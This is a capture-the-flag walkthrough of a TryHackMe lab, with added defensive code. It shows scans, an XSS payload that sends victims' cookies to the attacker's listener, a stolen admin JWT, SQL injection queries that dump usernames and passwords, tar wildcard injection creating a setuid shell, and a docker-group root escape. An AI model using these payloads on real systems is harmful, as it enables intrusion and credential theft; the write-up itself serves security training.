
# The Marketplace

**Room Link:** <https://tryhackme.com/room/marketplace>

## Initial Scan

**Kali**

```
nmap -A $VICTIM
```

<figure><img src="/files/B1cxnvXGxlmCmzq6In75" alt=""><figcaption></figcaption></figure>

## Scan all ports

**Kali**

```
nmap -sV -sT -O -p 1-65535 $VICTIM
```

<figure><img src="/files/EUvxT1f9ArNeahhb4Ygh" alt=""><figcaption></figcaption></figure>

## TCP/80 - HTTP

**Kali**

```
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

## TCP/32768 - HTTP

**Kali**

```
gobuster dir -u http://$VICTIM:32768 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="/files/TFw2Rc5yYzxwQmJdK644" alt=""><figcaption></figcaption></figure>

## XSS - Steal JWT

<https://jwt.io/>

<figure><img src="/files/c76dxz1YGo89EZbJ9ewa" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/QjIuCtQyfpSCfOlPAR8D" alt=""><figcaption></figcaption></figure>

I tried updating the token; it didn't work.

<figure><img src="/files/wzAqNdWzAz0UXdDKKz2i" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/dhZI10AlVcc9hyj1ybJl" alt=""><figcaption></figcaption></figure>

Next we're going to try to steal the JWT from another user.

**Kali**

```
nc -lvnp 4444
```

**Browser**

```
<script>document.location='http://$KALI:4444/XSS/grabber.php?c='+document.cookie</script>
```
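The payload above works only because the session token is readable from `document.cookie` and user-supplied post content is rendered as live HTML. The following is an added example (not code from the room or from this walkthrough) showing the two server-side controls that would have stopped it: output-encoding post content before it reaches the page, and issuing the session cookie with `HttpOnly` so script cannot read it. The `SAMPLE_POST` string and the `attacker.example` host are constructed placeholders, and `render_post` / `session_cookie_header` are hypothetical helper names.

```python
import html
from http.cookies import SimpleCookie

# Constructed payload of the same shape as the one used above; the callback host is a placeholder.
SAMPLE_POST = "<script>document.location='http://attacker.example/grab?c='+document.cookie</script>"


def render_post(content):
    """Output-encode user content before it lands in HTML, so markup becomes inert text."""
    return "<p class=\"post\">" + html.escape(content, quote=True) + "</p>"


def session_cookie_header(token):
    """Session cookie with HttpOnly (invisible to document.cookie), Secure and SameSite set."""
    c = SimpleCookie()
    c["token"] = token
    c["token"]["httponly"] = True
    c["token"]["secure"] = True
    c["token"]["samesite"] = "Strict"
    c["token"]["path"] = "/"
    return c.output(header="").strip()


def script_can_read_cookie(set_cookie_header):
    """Review check: a Set-Cookie line without HttpOnly is exposed to document.cookie."""
    attrs = [a.strip().lower() for a in set_cookie_header.split(";")[1:]]
    return "httponly" not in attrs


if __name__ == "__main__":
    print(render_post(SAMPLE_POST))
    print(session_cookie_header("demo-token"))
```

`HttpOnly` does not fix the XSS itself (a script can still act as the victim from inside the page), but it removes the cookie-exfiltration path this room relies on; the escaping in `render_post` is the actual fix.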

<figure><img src="/files/NFgOAQtfb7jmndwBgPUT" alt=""><figcaption></figcaption></figure>

This was annoying because if I went to my posts it wouldn't work, so I went to Jake's post and changed the number from 2 to 6 to get to the report page. Then I just clicked the report button.

<figure><img src="/files/4YdgzzkktKQHKMhS2x30" alt=""><figcaption></figcaption></figure>

We got a token from a user that isn't us.

<figure><img src="/files/vk7aJKw2reCLiXbCDCbh" alt=""><figcaption></figcaption></figure>

We can see it is from Michael who is an admin.

<figure><img src="/files/7CCCmQdmXENWULdCeYeN" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/LtpUF9NBn5akWy5z35V4" alt=""><figcaption></figcaption></figure>

Sent again, but this time I just forwarded the request so we could see what that script was doing.

<figure><img src="/files/zNLN0DB3IbN037txItTc" alt=""><figcaption></figcaption></figure>

The script was printing the flag.

<figure><img src="/files/Qb5zz4yJtO1349IdA16j" alt=""><figcaption></figcaption></figure>

This wasn't working before, but the next time I tried this box I could just update the cookie from the browser and it worked.

<figure><img src="/files/3D5fQV48YrTRiDJaGtew" alt=""><figcaption></figcaption></figure>

**Browser cookie**

```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDE1MjgzODN9.O8218jJ0nmWedeewklX6fkb9sjlgH81ciU7dJG5l9YY
```
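The cookie above is a JWT, which is why simply editing it in the browser earlier did not work: the third segment is an HMAC-SHA256 over the first two, so any change to the claims invalidates the signature unless you hold the server's secret, while Michael's stolen token is accepted as-is because its signature is genuine. The following is an added example (not the room's code) that decodes the captured token, shows the `admin: true` claim, and contrasts a properly verified token with one whose claims were edited without re-signing. `DEMO_SECRET` is a constructed value for the demonstration; the real signing secret is unknown, and the helper names are hypothetical.

```python
import base64
import hashlib
import hmac
import json

# Token captured from the admin session above (copied from the page; the signing secret is not known).
CAPTURED_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDE1MjgzODN9."
    "O8218jJ0nmWedeewklX6fkb9sjlgH81ciU7dJG5l9YY"
)

# Constructed secret for the demonstration only; the server's real secret is unknown.
DEMO_SECRET = b"demo-secret-not-the-real-one"


def b64url_decode(segment):
    """JWT segments are base64url without padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def compact_json(obj):
    return json.dumps(obj, separators=(",", ":")).encode("utf-8")


def decode_claims(token):
    """Read header and payload WITHOUT checking the signature (anyone can do this)."""
    header_b64, payload_b64, _ = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def sign_hs256(header_b64, payload_b64, secret):
    signing_input = (header_b64 + "." + payload_b64).encode("ascii")
    return b64url_encode(hmac.new(secret, signing_input, hashlib.sha256).digest())


def issue_hs256(payload, secret):
    """Mint a token the way the server would (same header shape as the captured one)."""
    header_b64 = b64url_encode(compact_json({"alg": "HS256", "typ": "JWT"}))
    payload_b64 = b64url_encode(compact_json(payload))
    return header_b64 + "." + payload_b64 + "." + sign_hs256(header_b64, payload_b64, secret)


def verify_hs256(token, secret):
    """Server-side check: recompute the MAC and compare in constant time."""
    header_b64, payload_b64, sig = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":  # never let the token choose the algorithm
        return False
    return hmac.compare_digest(sign_hs256(header_b64, payload_b64, secret), sig)


def edit_claims_without_resigning(token, **changes):
    """What editing the token in the browser amounts to: new claims, old signature."""
    header_b64, payload_b64, sig = token.split(".")
    payload = json.loads(b64url_decode(payload_b64))
    payload.update(changes)
    return header_b64 + "." + b64url_encode(compact_json(payload)) + "." + sig


if __name__ == "__main__":
    print(decode_claims(CAPTURED_TOKEN))
```

Decoding needs no secret, which is why the claims (`userId`, `username`, `admin`) are visible on jwt.io; only `verify_hs256` needs it. The `alg` check matters because a server that trusts the header's algorithm field is the classic `alg: none` weakness.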

We add an `ORDER BY` and increase the number until we get an error, which reveals how many fields there are.

<figure><img src="/files/49nsEmuJn3zXp2Efhf2k" alt=""><figcaption></figcaption></figure>

After 5 it gives us an error, so we know there are four fields.

<figure><img src="/files/Uu1borz2XsvDLHUPoEf2" alt=""><figcaption></figcaption></figure>

We do a `UNION SELECT`, first trying to show our 1s, which isn't working because the first part of the statement runs successfully and returns a row, so there's nowhere for our values to appear.

<figure><img src="/files/jm13gMqsZuVI6JlhRyVI" alt=""><figcaption></figcaption></figure>

To work around this we set the ID to 0, which probably doesn't exist, and we can start seeing our 1s.

<figure><img src="/files/roMd77ysZOrGLy3CZ5zB" alt=""><figcaption></figcaption></figure>

Get Version

<figure><img src="/files/AMhPsg9PWYtnbdvtCoaN" alt=""><figcaption></figcaption></figure>

Get Database

<figure><img src="/files/ksjBeP7NUalg0bS0A9B3" alt=""><figcaption></figcaption></figure>

Get tables

```
UNION SELECT table_name,1,1,1 FROM information_schema.tables WHERE table_schema=database()
```

<figure><img src="/files/cjtNfUJRAsdBZyAhb2BF" alt=""><figcaption></figcaption></figure>

Get All tables by concat

```
-1 UNION SELECT group_concat(table_name),1,1,1 FROM information_schema.tables WHERE table_schema=database()
```

<figure><img src="/files/pt6UcJaAPJAjHslZ1fY8" alt=""><figcaption></figcaption></figure>

Get Columns for table users

```
-1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM information_schema.columns WHERE table_name='users' AND table_schema='marketplace'
```

<figure><img src="/files/ZhzQaWH1rUyyNqajP37B" alt=""><figcaption></figcaption></figure>

Get Columns for table items

```
-1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='items' AND table_schema='marketplace'
```

<figure><img src="/files/IhJxpiiG3FLaIK72I6uF" alt=""><figcaption></figcaption></figure>

Get Columns for table messages

```
-1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='messages' AND table_schema='marketplace'
```

<figure><img src="/files/KlFTyPtGBwwehG6Q5QEt" alt=""><figcaption></figcaption></figure>

Get message contents

```
-1 UNION SELECT group_concat(message_content),1,1,1 FROM messages
```

<figure><img src="/files/nNtXGns9S7EoUEDjaW0E" alt=""><figcaption></figcaption></figure>

Get usernames and passwords. The passwords aren't too useful at this point, but now we have some usernames.

```
-1 UNION SELECT group_concat(username,'|',password),1,1,1 FROM users
```

<figure><img src="/files/ctLFVNzAkSKFD2jkj1Ds" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/pkjVU8vOyeVCiPNTRpE2" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/31oKA2OQe3JLVpEuKJUI" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/hmf8ABLTQi3kT1pklCVU" alt=""><figcaption></figcaption></figure>

## TCP/22 - SSH

**Kali**

```
ssh jake@$VICTIM
Password: @b_ENXkGYUCAv3zJ
```

<figure><img src="/files/gfBJraqdDGcZWTJMBjKl" alt=""><figcaption></figcaption></figure>

## Lateral Movement

**Exploit:** <https://gtfobins.github.io/gtfobins/tar/>

Jake can run a backup script as michael. The script uses a shell wildcard, which we can manipulate.

<figure><img src="/files/tdTIZl8r6zn6g6UTVvQk" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/12gyWkIGLLzGMkX2l2S5" alt=""><figcaption></figcaption></figure>

We can trick the script into running this to get a shell by creating empty files whose names look like tar options.

<figure><img src="/files/3TGPhnW1EtAS02TjeAZp" alt=""><figcaption></figcaption></figure>

**Victim**

```
cd /opt/backups
mkdir priv
cd priv
touch ./--checkpoint=1
touch "./--checkpoint-action=exec=sh shell.sh"
vi shell.sh
```

**shell.sh**

```
#!/bin/bash

cp /bin/bash /opt/backups/michealbash;
chmod +xs  /opt/backups/michealbash;
```

**Victim**

```
chmod +x shell.sh 
rm -f ../backup.tar 
sudo -u michael /opt/backups/backup.sh 
```
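The root cause here is `tar cf backup.tar *`: the shell expands `*` into separate arguments, so a file literally named `--checkpoint=1` arrives on tar's command line indistinguishable from an option. The following added example (not the room's script) builds a scratch directory with the same crafted names, shows what the shell hands to tar, flags the option-looking entries, and gives two hardened alternatives: an argv that points tar at the directory itself (`-C dir .`) so no untrusted name ever reaches argv, and a shell-free Python `tarfile` backup. The directory contents are constructed test data and the helper names are hypothetical.

```python
import os
import tarfile
import tempfile

# Constructed directory listing that mirrors the file names created in the steps above.
CRAFTED_NAMES = ["--checkpoint=1", "--checkpoint-action=exec=sh shell.sh", "shell.sh", "notes.txt"]


def make_demo_dir():
    """Build a scratch directory containing the crafted names (constructed test data)."""
    d = tempfile.mkdtemp(prefix="backups-")
    for name in CRAFTED_NAMES:
        with open(os.path.join(d, name), "w") as f:
            f.write("demo\n")
    return d


def shell_glob_names(directory):
    """What the shell substitutes for `*` in `cd directory; tar cf backup.tar *`."""
    return sorted(n for n in os.listdir(directory) if not n.startswith("."))


def option_like(names):
    """Names tar would parse as options because each is a separate argv entry."""
    return [n for n in names if n.startswith("-")]


def hardened_argv(directory, archive):
    """Point tar at the directory itself; its contents never reach argv, so they cannot be options."""
    return ["tar", "-cf", archive, "-C", directory, "."]


def safe_backup(directory, archive):
    """Shell-free equivalent: tarfile adds every entry as data and returns the member names."""
    with tarfile.open(archive, "w") as tar:
        tar.add(directory, arcname=".")
    with tarfile.open(archive, "r") as tar:
        return sorted(m.name for m in tar.getmembers() if m.isfile())


if __name__ == "__main__":
    d = make_demo_dir()
    print("shell glob gives tar:", shell_glob_names(d))
    print("option-like names:", option_like(shell_glob_names(d)))
    print("hardened argv:", hardened_argv(d, "backup.tar"))
    print("tarfile members:", safe_backup(d, os.path.join(tempfile.mkdtemp(), "backup.tar")))
```

An equivalent one-line fix in the original script is `tar cf backup.tar -- *` or `tar cf backup.tar -C /opt/backups .`; either way the crafted names end up inside the archive as ordinary files, which is exactly what `safe_backup` returns.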

<figure><img src="/files/k4Umi3Eu6GOTAVgiKtV8" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

**Victim (michael)**

```
id
find / -name docker.sock 2>/dev/null
docker images
docker run -it -v /:/host/ alpine chroot /host/ sh
```

michael is part of the docker group, so it appears we're in a pod.

<figure><img src="/files/n0eniqoaSipFMjsNkZor" alt=""><figcaption></figcaption></figure>

There are a few images to test. I just ran the last command above and changed the image name until it worked. The exploit worked with the nginx and mysql images as well.

<figure><img src="/files/1f1kDx0JK8molhmypq7G" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/Rug1ZrjbkApUZB6qg9MI" alt=""><figcaption></figcaption></figure>

